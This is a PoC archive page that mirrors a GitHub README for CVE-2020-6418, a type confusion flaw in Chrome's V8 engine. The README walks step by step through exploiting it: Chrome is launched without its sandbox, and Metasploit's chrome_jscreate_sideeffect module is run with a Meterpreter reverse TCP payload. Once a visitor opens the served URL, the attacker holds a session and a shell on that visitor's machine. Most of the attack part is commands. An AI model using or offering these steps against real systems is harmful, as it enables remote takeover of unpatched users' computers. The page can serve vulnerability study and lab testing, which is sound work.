Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2020-6418 PoC — Google Chrome V8 安全漏洞

Source
https://github.com/SivaPriyaRanganatha/CVE-2020-6418
Associated Vulnerability
Title:Google Chrome V8 安全漏洞 (CVE-2020-6418)
Description:Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Readme
# CVE-2020-6418
The CVE 2020-6418 is about the the type confusion in V8 in Google chrome.The affected versions were prior to 80.0.3987.122. The vulnerability is achived by remote attacker accessing the shell of a target device via a crafted HTML page.

## Environment Requirements
1) Google Chrome with version prior to 80.0.3987.122 .
```
Note : The Google chrome browser should run with no sandbox for the exploit to be succesfull.
```
2) Metasploit Framework
3) OS : Any 

### Exploit Set Up
1) Google Chrome Version v80.0.3987.87  <br />
 https://www.neowin.net/news/google-chrome-800398787-offline-installer/
3) Windows v11
4) Kali Linux v2021.1

## Google Chrome Set-Up with no sandbox
i) Create a short-cut for Google chrome <br />
ii) Click on the properities > go to option called "Target" <br />
iii) At the end of EXE , give space and enter -no--sandbox <br />
iv) Click Apply > Ok <br />
v) Open new browser Google Chrome and you will find the pop-up stating the below.
```
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer

```
### Demonstration to Disable Sandbox
https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

## Using Metasploit
Since we are using Kali as an enviroment to carry out the exploit , metasploit comes as a built-in tool with the distro. But if you are using other distros we need to set up metaspolit before we begin the exploit.

Refer to the **Metasploit installation** for further understanding.

## Performing the exploit 
i) Starting metasploit framework
```
> msfconsole

```
ii) Find the exploit 

```
> search chrome_js

```
iii) Use the available exploit from the above output

```
> Use exploit/multi/browser/chrome_jscreate_sideeffect

```
iv) Provide SRVHOST IP address

```
> set SRVHOST <ip address>

```
v) Provide Target 
   Here we get two options 
   1) Target 0 : For Windows 
   2) Target 1 : For MAC
```
> set Target " Number "
```
vi) Provide Payload 
```
> set PAYLOAD windows/x64/meterpreter/reverse_tcp

```
vii) To check the current settings and options enabled.

```
> show options

```
viii) To run the exploit 

```
> run (or) > exploit

```
ix) You will be proivded with an URL , which should be copied on the browser for the session to get active.

x) Once the user accesses the URL , a session will be created. To check this 

```
> show sessions

```
xi) Using the session , we can check the user system info / enter the shell.
```
> sessions <number>
> shell

```
### Demonstration to exploit

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →